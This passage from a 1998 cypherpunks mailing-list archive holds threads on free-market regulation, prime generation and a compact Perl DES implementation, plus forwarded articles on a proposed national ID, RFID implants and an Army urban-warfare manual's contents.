the South Seas company in Great Britian and the Mississippi Scheme in
France.  The paper was appreciating daily, and that is all that mattered. 
Until the paper became illiquid.  Then it mattered very much if the
businesses were intrinsically sound and healthy and correctly valued. 

And I think we will see the same thing here and across the globe shortly.
Japan started to see this in the early '90s.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tzeruch@ceddec.com
Date: Tue, 20 Oct 1998 12:42:50 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Another question about free-markets... (fwd)
In-Reply-To: <199810051237.HAA03149@einstein.ssz.com>
Message-ID: <98Oct19.235259edt.42143@brickwall.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 5 Oct 1998, Jim Choate wrote:

> > > If this includes lying, denying consumers information, etc.
> > > what harm is done, they have fulfilled their responsibility
> > > to their shareholders (potentialy quite lucratively)=20
> > 
> > While there is a sucker born every minute, the strategy you
> > describe is for the most part unlikely to be profitable.
> 
> Then you should begin to check your daily news, example after example is
> presented. (currently illegal) cell phone cloning, excessive rate levels,
> sub-standard construction practices, etc.

Most of these are due to regulation.  If you assume the Secret Service
will bear the cost of enforcing anti-cloning laws, you will not spend the
money to make your phones unclonable even if the technology exists.

Excessive rate levels are a misnomer.  The only way you can succeed in
charging above market prices is if there is a law to bar entry.

sub-standard construction is also a misnomer - if you paid for standard X,
you simply don't pay until the construction is up to that standard.  If
you are talking about government projects, you introduce some distortion,
e.g. where they demand to pay below-market prices.  Further, if you don't
want to pay for certification of the quality, you can't call it
"substandard" because you aren't paying to have a standard enforced.

> Not only can it happen it deos. Given that such abuse is possible in a
> regulated market there is no reason not to deduce it will happen in a free
> market economy as well. If it happens the business enjoys an increased profit
> if for no other reason than their costs are reduced. Since there is no
> regulation or other oversight the consumer will be denied this information
> preventing fair competition. Since a companies strategic leaders have no
> duty other than maximizing profit they will impliment such strategies. Hence
> the free-market reduces to an opportunistic anarchy.

Hardly.  If you are saying consumers are stupid, you are probably right,
and their ignorance may be rational, since it would be expensive to
certify everything you encounter in one day.  But it does not mean that
business would enjoy any increased profit.  Consumers would simply bid
down the price where companies would compete on who could supply
substandard dreck most efficiently.

Nor would they really be denied information.  Some people subscribe to
consumer reports, some don't.  If you buy a noname blackbox, it is your
choice.  If you buy something that is rated as being good you may pay
more, but would get extra value (and consumer reports makes money by
coming as close as possible to unbiased testing in the main).

And you assume that men are islands and don't talk or communicate. 
Imagine two restaraunts.  If people get food poisoning every week or so at
one, people will learn not to go there, and it will fold as people go to
the second.  Reputation (economists include it in the term "good will")
does have an economic benefit.  And it does not require government to
regulate.  If fact government is usually the worst in determining quality
- the USDA uses sniffing and appearance instead of microbiology for a very
long time (until an e. coli outbreak).  But they certify all infected meat
as grade-A if the inspector is in a good mood.  And good meat will lose
points if the inspector is in a bad mood.  But because of the USDA, no
private concern can compete to certify healthy food (and one reason I have
cut meat consumption - what the government allows or is incapable of
catching can kill me in very unpleasant ways).

Consumers will only be denied infomation pertaining to quality if they
insist on not paying for it.  And "free" information from the government
in the form of certification or regulation is worth what you pay for it.

Underwriters lab certified things for insurance companies.  A similar
organization could insure healthy food (by publishing their standards and
charging for either inspection or results).

> This leads to one and only one conclusion, in a free-market there is no such
> thing as 'fair trade' without a third party being involved. This runs
> contrary to the definition of a free market on two counts (at least) and
> therefore the free market theory (as applied to human business, not Vulcan)
> is a circular argument based on faulty principles and a lack of
> understanding of human psychology (ie assumptions such as rational
> purchases).

You simply may not like human psychology, but that does not make the free
market any less just.  In fact, most "problems" like insurance derive from
human psychology.  People want to beleive lies.  Or want to remain
ignorant.  And don't want to take responsibility for their own actions. 
The market is completely fair and just - which are also virtues.  It is
not merciful or kind, but that is NOT its function. 

I can buy (or sell) at a given price, or I can choose not to.  The offered
price may not be a good value, but I will need to invest additional time
and money to determine that, and that is a secondary choice, but it is
still fair.  If a stock is selling at $50 on the NYSE, nothing stops you
from buying it from me at $250.  This would be unwise but not unfair.  Nor
would it require any third party.  If you know I take advantage of
ignorance, you will not deal with me without informing yourself first.
You may rationally decide not to check if I sell near market prices if
it is typical that most people do.  But you will acquire the information
of my business practice with the purchase.  You may also rationally get a
second bid.  No one witholds information.  But no one forces information
upon you.  You have only to act rationally at whatever level you decide.

In my earlier post, I mentioned that I think stocks are in a bubble - i.e.
overvalued by 70%.  Which if any government agency is saying this?  Are
these fair prices?  You think so if you bought in when they were only
overvalued by 50%.  But how does the government prevent people from
bidding up the price of stocks, or beanie babies?  I think they are called
crazes or manias for good reason.  When it collapses they will call on the
government, but all the information will have been there in black and
white all along.  But they would rather belive in a pleasant illusion
than cold reality.  And you can't make any regulation that will change
that.  Illusions also have prices.  And people will gladly pay them.  This
is unwise (A fool and his money are soon parted), but not unfair (wisdom
has riches in her left hand and long life in her right).

The market enforces a foolishness tax which no government can repeal.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 20 Oct 1998 05:38:41 +0800
To: cypherpunks@cyberpass.net
Subject: "Microsoft is racist"
Message-ID: <199810192111.OAA06317@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain





http://www.wired.com/news/news/politics/story/15702.html

                     On the sidewalk in front of the building, a
                     handful of protesters held up a sign
                     saying "Microsoft is racist." The group
                     attacked the company for not donating
                     money to Howard University, which is
                     predominately black. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 21 Oct 1998 01:04:58 +0800
To: cypherpunks@toad.com
Subject: Re: 2 questions: Prime Numbers and DES
In-Reply-To: <19981018.151326.-968627.0.Steve.Benjamin@juno.com>
Message-ID: <3.0.5.32.19981019174636.008a3e00@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Go look around for the crypto archives.  Some good places have been
www.replay.com (or replay.nl?), ftp.funet.fi, ftp.ox.ac.uk, ftp.dsi.unimi.it.
Look for the Cyphernomicon and the sci.crypt faqs.  Altavista is your friend.

If you want code for DOS, remember that you can compile and run
C programs on DOS, and a bare-bones DES program that uses stdin and stdout
should do just fine.

For prime numbers, read some books!  Bruce Schneier's book is a good
place to start.  Also, look around on www.rsa.com.

The standard approach to generating large prime numbers is to generate
large random odd numbers of the length you want and see if they're prime.
Actually proving primality is hard, but there are tests for "probable primes"
that appear to be independent - so you take the candidate numbers and
run 20 iterations of a test to get probability 2**-20 or 2**-40 of error.
Depending on speed of things, it's usually more efficient to run a sieve
to eliminate multiples of small primes (certainly 2,3,5,7, possibly many more)
since those tests are often faster than the probable primality testing.

If you want to _understand_ this stuff, as opposed to merely using it,
you'll need some math, specifically number theory dealing with primes
and modular arithmetic.  But start with Schneier.


At 03:13 PM 10/18/98 -0400, Stephen Benjamin wrote:
>1.  How can I generate 2 large prime numbers?  I doubt I could create 2,
>100-digit prime numbers in my head :-)
>
>2.  Is there an implentation of DES in perl?  I didn't see a link to one
>on the export-a-sig page.  If not perl, is there one for DOS?  I'm
>looking for a bare bones one, not something with tons of features
>and a GUI.  A perl or dos version of the unix "des" program would be
>preferable.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 20 Oct 1998 09:20:02 +0800
To: cypherpunks@cyberpass.net
Subject: IP: WEBSITE: Military Operations on Urbanized Terrain (MOUT)
Message-ID: <199810200056.RAA08052@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: WEBSITE: Military Operations on Urbanized Terrain (MOUT)
Date: Mon, 19 Oct 1998 00:39:27 -0500
To: believer@telepath.com

Forwarded:
----------------

Date: Sun, 18 Oct 1998 21:44:43 -0700
From: "A.C." <angie@computerhut.net>
Subject: WEBSITE: Military Operations on Urbanized Terrain (MOUT)

BELOW IS A SITE WORTH VISITING AND DESERVING OF CAREFUL STUDY, as the US
military has made it clear in its numerous documents, that a considerable
segment of the US population is suspect, and a sizable number are of the
"warrior classes," hence must be contained.  Machiavelli, a shrewd military
strategist, understood well the strategies for keeping the balance of power
and, thus, advised the princes of Renaissance Italy, which at that time
were a collection of powerful city-states, always at war with each other.
Machiavelli's  strategies AND PHILOSOPHIES, have been, still are, the
subject of SERIOUS study by US military strategists.

"He [the prince or any ruler] must, therefore, never raise his thought from
this exercise of war, and in peacetime, he must train himself more than in
time of war; this can be done in two ways: one by action, the other by the
mind.  And as far as actions are concerned, besides keeping his soldiers
well disciplined and trained, he must always be out hunting, and must
accustom his body to hardships in this manner; and HE MUST ALSO LEARN THE
NATURE OF THE TERRAIN, AND KNOW HOW MOUNTAINS SLOPE, HOW VALLEYS OPEN, HOW
PLAINS LIE, AND UNDERSTAND THE NATURE OF RIVERS AND SWAMPS; [emphasis ac]
and he should devote much attention to such activities. ... and a Prince
who lacks this ability lacks the most important quality in a leader;
because this skill teaches you to find the enemy, choose a campsite, lead
troops, organize them for battle, and besiege towns to your own advantage."
 .... Therefore, a prince must not worry about the reproach of cruelty when
it is a matter of keeping his subjects united and loyal; ......."  The
Prince, by Machiavelli.    
>
>http://earthops.org/sovereign/urban_warfare/

>Military Operations on Urbanized Terrain (MOUT)

            FM 90-10
 Headquarters Department of Army
  Washington, DC, 15 August 1979 

                              FM 90-10

                     Military Operations
                          on Urbanized
                       Terrain (MOUT)

                       Table of Contents

CHAPTER 1... INTRODUCTION 

     Urbanization 

     Characteristics of Urban Warfare 

CHAPTER 2... OFFENSE 

     How the Enemy Defends 

     Planning the Attack 

     The Offensive Battle 

     Corps 

     Division 

     Brigade 

     Battalion Task Force 

CHAPTER 3... DEFENSE 

     How the Enemy Attacks 

     Planning the Defense 

     The Defensive Battle 

     Corps 

     Division 

     Brigade 

     Battalion Task Force 

CHAPTER 4... COMBAT SUPPORT 

     Field Artillery 

     Engineer 

     Army Aviation 

     Tactical Air 

     Air Defense 

     Military Police 

     Chemical 

     Communications 

CHAPTER 5... COMBAT SERVICE SUPPORT 

     Support Organization 

     Logistical Functions 

     Noncombatants 

     Civil Affairs Operations 

     Refugee Control 

APPENDIX A... Urban Terrain Analysis 

APPENDIX B... Weapons Effects And Employment 

APPENDIX C... How To Select And Prepare Defensive Positions In Built-Up Areas 

APPENDIX D... Employment Of Obstacles And Mines In Built-Up Areas 

APPENDIX E... Demolitlons 

APPENDIX F... Armored Forces In Built-Up Area 

APPENDIX G... How To Attack And Clear Building 

APPENDIX H... References And International Agreements 




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 20 Oct 1998 09:21:31 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] National ID back on table?
Message-ID: <199810200056.RAA08063@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: [FP] National ID back on table?
Date: Mon, 19 Oct 1998 09:52:36 -0500
To: believer@telepath.com

Forwarded:
---------------
From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: [FP] National ID back on table?
Date: Mon, 19 Oct 1998 07:05:28 -0500

SCAN THIS NEWS

MONDAY
OCTOBER 19, 1998

National ID back on table?
 Weekend maneuvers in Congress
 may kill moratorium

http://www.worldnetdaily.com/exclusiv/981019_national_id_back_o.shtml

By David M. Bresnahan
Copyright 1998, WorldNetDaily.com

Last-minute deals on Capitol Hill may remove a previously negotiated
moratorium on the national ID card, and one organization opposed to the card
is not surprised or disappointed.

The law was already passed by Congress in 1996 and a national ID for all
Americans will soon be in use unless changes to the law are made soon. The
omnibus appropriations bill contained a ban on the national ID, first
exposed in WorldNetDaily, but over the weekend efforts were made to remove
that ban.

A great many bills were never voted on during the year. With elections just
around the corner, politicians want to go home to their districts and brag
about something they've done this past year. The omnibus bill contains
thousands of pages, including many pet projects intended to win votes.

The main purpose of the bill, negotiated last week and scheduled for a vote
tomorrow, is to approve the budget and keep government in business. Prior to
the negotiations last week, all sides were predicting a shut-down of
government over disagreements in the budget. No one in Congress wants to
explain to voters why government has come to a grinding halt just before an
election, so the passage of the omnibus bill is assured, along with anything
else attached to it.

"There are so many deals that have been made and are still being made that
no one will ever know exactly what's in that thing and what's not until long
after the vote is over and the members all go home to campaign," explained a
congressional aide who did not wish to be named.

The moratorium was first included in the transportation appropriations bill,
but Rep. Lamar Smith, R-TX, convinced Speaker Newt Gingrich, R-GA, to remove
it before passage, according to House Transportation Committee sources.

The ban on the national ID was then included the omnibus bill. However,
Smith has continued to make efforts to kill the provision, according to a
congressional source who has been working on the ban.

"It's very hard to say just what will happen, but I do know that Smith has
recruited help from some other members and the Speaker is considering their
requests," said the source yesterday. It was Smith who got the national ID
ban out of the transportation appropriations bill.

"It was reported that Lamar Smith had obtained an agreement from Speaker
Gingrich to eliminate this provision from the bill," reported Patrick Poole
of the Free Congress Foundation. The ban was back in the bill "after many
House members openly complained to the speaker about Lamar Smith's seemingly
religious devotion to the national ID idea and the American people's
vehement opposition to being branded and tagged by the U.S. government,"
explained Poole.

Numerous organizations opposed to the concept of a national ID rallied their
members to send thousands of letters, faxes, and make phone calls to
Congress for the past two weeks. Rep. Smith could not be reached on Sunday
night by WorldNetDaily, but he did publish a letter in the Washington Times
last Tuesday because of the many calls his office received.

"I do not support a national ID card and don't know anyone in Congress who
does," said Smith in his letter. He tried to label those voicing opposition
as radicals when he added, "There are fringe groups that believe the United
Nations is taking over Yellowstone National Park, that Congress is creating
a national ID card or that they have been abducted by UFOs."

The law to create a national ID card was passed as part of the Illegal
Immigration Reform and Immigrant Responsibility Act of 1996. One section of
the act requires all states to make their driver's licenses comply with
certain guidelines found in Section 656 (b) of the act, including the use of
the Social Security Number on all licences and in all data bases beginning
Oct. 1, 2000.

The act also calls for digitized biometric information to be a part of each
license, or "smart card." The biometric information will include
fingerprints, retina scans, DNA prints, and other similar information.

Responsibility for the design and implementation of the cards has been given
to the National Highway Traffic Safety Administration of the Department of
Transportation. That agency has recently published the proposed "Driver's
License/SSN/National Identification Document," which contains the guidelines
which must be in force by each state -- a federal mandate once campaigned
against by many conservative Republicans.

"These new national ID regulations violate every notion of federalism,
because they force states to comply with regulations issued by the federal
government without any constitutional authority to do so," said Poole
recently. "Nor are federal agencies empowered to force states to gather
detailed information on every person in order to comply with federal
mandates. The net result of the DOT's regulations is to establish a national
ID system, which has been opposed by almost every non-governmental sector
for the past five decades."

House Majority Leader Dick Armey, R-TX, Rep. Ron Paul, R-TX, and Rep. Bob
Barr, R-GA, have been working on repeal legislation, but there was
insufficient time to bring it to a vote during this session of Congress.

The DOT solicited public comments on their plans for implementation of
Section 656 (b) of the act earlier this year. The public comment period has
just closed and many thousands of letters in opposition were received,
according to a spokesman. Five states also expressed opposition to the plan,
and only a "small number" of letters supporting the plan were known to the
spokesman, who spoke on condition that his name would not be published.

One group that has worked diligently for the repeal of the national ID card
was not surprised to learn of plans to remove the ban from the omnibus bill.

"I won't be terribly disappointed if the one-year moratorium is removed from
the appropriations bill. In fact, if left in, the moratorium may actually
serve to provide an unwelcomed delay in this issue being addressed by
Congress and the DOT," said Scott McDonald leader of "Fight the
Fingerprint."

McDonald says his group will use the situation to educate more people
regardless of which way the bill ends up. He is concerned that national
debate on the national ID will be delayed by the ban and would lessen the
chances to get the law repealed. McDonald wants the debate to begin now.

"Time is on the side of the proponents of the national ID. Opposition to any
issue tends to wane as time passes. The American people have already firmly
stated their strong opposition to the DOT's proposed standardized driver's
license proposal. Now it's time for the DOT to act on behalf of the people
they serve. The DOT should go back to Congress with a report stating that
the American people do not want a national ID which the 1996 immigration law
would establish via standardized driver's licenses," explained McDonald on
Sunday.

McDonald's group is opposed to the use of Social Security numbers from being
used as past of driver's licences and in centralized government databases
tied to driver's licenses and other government documents. His group is also
opposed to the use of fingerprints on such records.

In the event there is a moratorium on the implementation of the National ID,
McDonald predicts there will be a good chance the DOT will design a
compromise which will keep Social Security numbers off licences but keep the
number on license applications and in universal data bases to keep track of
individuals.

Without a moratorium, a report must be provided by DOT detailing the
responses they received from the public on the issue. McDonald wants
Congress to see that report as soon as possible.

"Without the temporary reprieve, the DOT is required by law to respond to
all public comments which have been filed with the agency, and to publish
their responses in the Federal Register," said McDonald. "I am anxious to
see their responses. If the moratorium goes into effect, the DOT may be able
to avoid this mandatory requirement. The American people deserve to be know
what the DOT's official position is in response to the objections raised by
those individuals and groups who took the time to object."

-------------------------------------------------------------------------

You can call the capitol toll free at........1-800-378-1844

Lamar Smith..................................1-202-225-4236
Speaker Gingrich.............................1-202-225-0600

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 20 Oct 1998 09:26:57 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Brave New World of Implants
Message-ID: <199810200056.RAA08074@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Brave New World of Implants
Date: Mon, 19 Oct 1998 10:42:06 -0500
To: believer@telepath.com

Source:  Jewish World Review / Oct. 19,1998 / 29 Tishrei, 5759 
http://www.jewishworldreview.com/0798/mothernature.html

Can we 'fool Mother Nature'?
Do we want to?

By David S. Oderberg 

IMAGINE THAT YOU have been fitted with a tiny
electronic device, measuring nearly an inch long and a third
of an inch wide. This device receives and emits radio waves
in the presence of transceivers in 'intelligent' buildings
fitted to recognize the unique signal emanating from the
tiny 'smart' chip in your body. This chip, implanted just
under the skin on your arm, has immense advantages. With
it you can open and close doors, pass through security
channels set up to recognize your identity, operate
machines such as computers and faxes, and generally
negotiate your technological world with greater ease and
convenience than at present. You can even use your chip to
carry out daily commerce. 

Swipe your arm over a scanner and you can make
payments, have your account debited automatically, check
you bank balance. In short, you can do everything which
currently requires you to lug around a walletful of credit
cards. One small catch, though: because of this chip, your
whereabouts are known to others at every minute of every
day. You can be tracked like a car or airplane. 

Orwellian nightmare? Delusional apocalyptic fantasy? One
would have thought so, until it emerged in the British press
a short while ago that Kevin Warwick, professor of
cybernetics at the University of Reading -- my own
university, as a matter of fact -- has decided to try out such
a scenario on himself. 

Seeing himself as a latter day Edward Jenner -- the
pioneering scientist who tried out the smallpox vaccine on
his own body -- Prof. Warwick has entered the hallowed
halls of self-experimentation by having just such a silicon
chip injected under the skin near his elbow. He is, as far as
anyone knows, the first person to do so. The results of his
experiment are not yet known. He has to take antibiotics
against the risk of infection, and is a little concerned his
body will reject the alien device. 

Speaking of the doctor who agreed to implant the chip,
Prof. Warwick says: "If it all goes wrong and my arm
explodes, which I have been warned could happen, my wife
will probably sue...". 

The good professor is, nevertheless, sanguine about the
possible side effects. For he sees himself as a crusader at
the cutting edge of cybertechnology. Already famous for his
little machines -- looking a bit like cockroaches on wheels --
which, he glows, behave for all the world as though they
have intelligence (something I and others doubted when we
saw them in action), Prof. Warwick is thrusting forward in
the attempt to fulfil the prophecy of his own recent
best-seller, March of the Machines. 

"It is possible," he says, "for machines to become more
intelligent than humans in the reasonably near future.
Machines will then become the dominant life form on earth."
Is this a tragedy? No, he adds blithely: "We are just an
animal, not much better or worse than the other animals. We
have our uses [sic], because we are different. We are
slightly more intelligent than the other animals." 

The professor looks forward to the day when machines rule
our lives. The fact that his microchip enables him to be
traced is no great worry. His secretary finds it a boon: "It
was often hard to find Prof. Warwick...but since the implant
we always know where he is." 

And so would your employer if you were similarly
implanted. You would be monitored every time you clocked
in and out of work, or left the workplace. Prof. Warwick
surmises the chip could carry all sorts of information, such
as medical records, past convictions, financial data. 

"It is quite possible for an implant to replace an Access or
Visa card. There is very little danger in losing an implant or
having it stolen," he said. But it seems Prof. Warwick is alive
to the dangers of the microchip implant: "I know all this
smacks of Big Brother," he comments. 

Where the technology will ultimately go "I really don't know
and would not like to envisage." 

By now, you may well be feeling a little spooked. This is not
surprising. Nor should the experiment itself be such a
shock. After all, on October 11th 1993, The Washington
Times reported on the "high-tech national tattoo" made by
Hughes Aircraft Company --- an implantable transponder
which the company called "an ingenious, safe, inexpensive,
foolproof and permanent method of ... identification using
radio waves." 

In 1994, in the St. Louis Post-Dispatch, it was reported that a
local humane society offered pet owners, for $25, to inject
their dogs or cats with a microchip, to prevent their being
lost or stolen. A Dr. Carl Sanders, electronics engineer and
inventor of the Intelligent Manned Interface biochip, told the
Monetary Economic Review that satellites could be used to
track people fitted with the IMI chip: "We used this with
military personnel in the Iraq war where they were actually
tracked using this particular type of device." 

Whether soldiers have actually 'volunteered' to be
surgically implanted with the chip, as opposed to carrying it
on their clothing, is not made clear by Dr. Sanders. But what
we do know is that proponents of this technology envisage
first using it on animals (now widespread, particularly dogs,
cats and cattle), then prisoners (more effective than
electronic ankle tags), then children (e.g., newborn babies,
so as to prevent their being switched or lost) and elderly
people suffering from Alzheimer's disease (to prevent their
wandering and getting lost). After that, who knows? The
potential for the chips to replace credit cards and cash is
huge, and will tempt financial institutions in turn to tempt
their customers to 'try out' the chip with no obligation to
carry it permanently, and monetary rewards for those who
persevere. 

Supporters of the injectible microchip say it is just the
logical extension of a technology that already allows the
heavy monitoring of people through pagers, cellular
phones, 'smart' cards, and cars fitted with Global
Positioning System transponders. On the other hand, could
it not be said that the advent of the chip implant is the final
outrage which demonstrates the inherent unacceptability of
its technological ancestors? We are, it seems, fast
approaching a world that even George Orwell was not able
to envisage. 

Had the microchip implant been known in his day there can
be no doubt it would have replaced the 'telescreen' in his
dystopian novel 1984. The fact that the corporations and
individuals promoting its use are not being bombarded
daily with protests from millions of outraged citizens is itself
cause for wonder. How, particularly in countries such as
the USA and Britain in which civil liberties are so prized, is it
possible for so much propaganda to reach the mass media
with barely a hint of contrary opinion? 

Prof. Warwick has gained enormous publicity, and is
flooded with calls from journalists wanting to know how his
little experiment is going. Until, however, a sufficient
number of citizens make known their implacable opposition
to the totalitarian trend of a technology which threatens to
reduce most humans to the status of cattle, the likes of Prof.
Warwick will go about their evil work unperturbed.


JWR contributor Dr. David S. Oderberg is Lecturer in
Philosophy at the University of Reading, England, and a
freelance journalist. 

 (c)1998, David S. Oderberg
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Elliott <k-elliott@wiu.edu>
Date: Tue, 20 Oct 1998 07:43:10 +0800
To: cypherpunks@cyberpass.net
Subject: RE: IP: Fwd: Evaluation of Vehicle Stopping Prototype ("KillSwitch")
In-Reply-To: <362B8D7F.888@lsil.com>
Message-ID: <v04020a00b251718551b4@[143.43.245.6]>
MIME-Version: 1.0
Content-Type: text/plain



>BTW - Did you see the bullshit that happened up in Vallejo? Cops sent a
>dog into a culvert after a suspect. The suspect shot and killed the dog.
>The police had a full-fledged funeral, casket and all for the fucking
>dog. Flowers all over he place, mourners. Now they're buying goddamned
>kevlar vests for their dogs. Fuckheads. Who's the citizen? The human or
>the dog?

It costs money to train an attack dog- kevlar sounds like a good way to
protect the states investment.

>As for the suspect he's charged with something for killing the dog.

Definitely manslaughter, probably 2nd or even 1st degree murder.  In (I
believe) every state the union the penalty for shooting a police dog is the
same as shooting an on duty police officer.  Police dogs are effectively
classified as deputies.

>Simple destruction of property, which would be a charge befitting the
>act, is probably not enough to avenge beloved Bowser's death. Because
>it's a cop-dog-on-duty the penalty is probably more than restitution and
>some community service. Jail time for defending yourself against an
>attack dog?

I'm not sure the issue is as simple as you paint it.  You say defending
yourself from an attack dog- however attack dog implies your life was in
danger (if it was it would be comfortably within your rights to shoot the
dog as self defense) inherent in it being a police dog is that it is well
trained and won't kill you (this is in general- I don't know the specifics
of the case and so don't have perfect info on what was going on when he
shot the dog).  Their is also the issue of resisting arrest (I don't know
exactly how he got in that culvert, but I suspect he wasn't enjoying the
scenery) and shooting at the police.  We have to consider shooting at the
dog in the same category as shooting at the police for the same reason
shooting at their car would be in the same category as shooting at the
police.  Regardless we know have a total of 3 crimes that seem to me add up
to jail time regardless of whatever he was originally being chased for.
1. Resisting arrest
2. Shooting at the police
3. Killing the dog (whatever crime you want to classify this as)


___________________________________________________________________________
"DOS/WIN based computers manufactured by companies such as IBM, Compaq,
Tandy, and millions of others, are by far the most popular, with about 70
million machines in use worldwide. Macintosh fans, on the other hand, note
that cockroaches are far more numerous than humans, and that numbers alone
do not denote a higher life form." - New York Times

-Kevin "The Cubbie" Elliott <mailto:k-elliott@wiu.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 20 Oct 1998 09:19:54 +0800
To: cypherpunks@cyberpass.net
Subject: Dorkslayers..
Message-ID: <v04020a07b251902b1a05@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: steven.soroka@mts.mb.ca
X-Lotus-FromDomain: MTS
To: coderpunks@toad.com
Date: Mon, 19 Oct 1998 18:02:52 -0500
Subject: Dorkslayers..
Mime-Version: 1.0
Sender: owner-coderpunks@toad.com
Precedence: bulk

You'll notice that toad.com is on the dorkslayers list, (under ip
140.174.2.1)..
It'd advisable to find a way to remove it..

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 20 Oct 1998 04:42:50 +0800
To: fisherm@tce.com
Subject: Re: 2 questions: Prime Numbers and DES
In-Reply-To: <2C396693FBDED111AEF60000F84104A721C02B@indyexch_fddi.indy.tce.com>
Message-ID: <199810191956.UAA08549@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




> Steve Benjamin writes:
> >2.  Is there an implentation of DES in perl?  I didn't see a link to one
> >on the export-a-sig page.  If not perl, is there one for DOS?  I'm
> >looking for a bare bones one, not something with tons of features
> >and a GUI.  A perl or dos version of the unix "des" program would be
> >preferable.
> 
> CPAN (the Comprehensive Perl Archive Network),
> <URL:http://www.perl.com/CPAN/>, is your friend -- use it.  (Look under
> "Authentication, Security and Encryption" -- there are 3 versions of DES
> listed, along with an interface to SSLeay, which includes DES as one of its
> algorithms).

Steve Reid wrote an RSA key generator in perl and dc.  See:

	http://sea-to-sky.net/~sreid/rsagen.txt

I am not sure about the security of the keygeneration algorithm.  Ron
Rivest suggested it as a hack to more easily generate keys on the
coderpunks list I think a year or so back, when Steve was discussing
easier ways to generate valid RSA keys.  But I am not sure if such
keys are hard to factor or not.  Perhaps one should ask Rivest before
using it, you'll have to check the archives for Rivest's comments,
unless you can understand the alogirthm from Steve's code.

Also you asked about DES, here's a compact perl version of DES (not on
my web page, must have forgotten to add it), by John Allen:

#!/bin/perl -s-- DES in perl5
$/=" ";sub u{$_=<DATA>;s/\s//g;map{-33+ord}/./g}$"='';$[=1;@S=map{[u]}1..8;@I=
u;@F=u;@C=(split//,unpack B64,pack H16,$k.0 x16)[u];@D=splice@C,29;@p=u;$_=11 .
2222221 x2;for$l(/./g){map{push@$_,splice@$_,1,$l}\@C,\@D;$K[++$i]="@{[(@C,@D)
[@p]]}"}@E=u;@P=u;%a=map{unpack(B8,chr$_),$_}0..63;while(read STDIN,$b,8){@L=(
split//,unpack B64,$b."\0"x7)[@I];@R=splice@L,33;for$i(1..16){$i=17-$i if$d;@t
=@R[@E];$j=1;$n=0;for(($K[$i]^"@t"|0 x48)=~/.{6}/g){($n<<=4)+=${$S[$j++]}[$a{
"00$_"}+1]};@t=(split//,unpack B32,pack N,$n)[@P];@X=split//,"@L"^"@t"|0 x32;
@L=@R;@R=@X}print pack B64,join'',(@R,@L)[@F]}__END__~printunpacku,'$2F%P:```'
/!%0.("%#/0#,.)"$++''--,&**&!$()%0"-/))#.%'*#",(0&-,*$(/$++!&'!. 0$".)%/('0,#$
)%/*-(!#".+-'!*&,+&!./)(+,"+$%0.%"#&,)'-('-*!$&#/0* +.!(*!/*'$$%0'&+"#.)-&(/,-
%,#0)"."'+%.*!)'0*$)!(,%"0#/-$&,+&/#(- (..)/,$&!''0*!+$"%#()#&-,"-+%/0*+$'0*!!
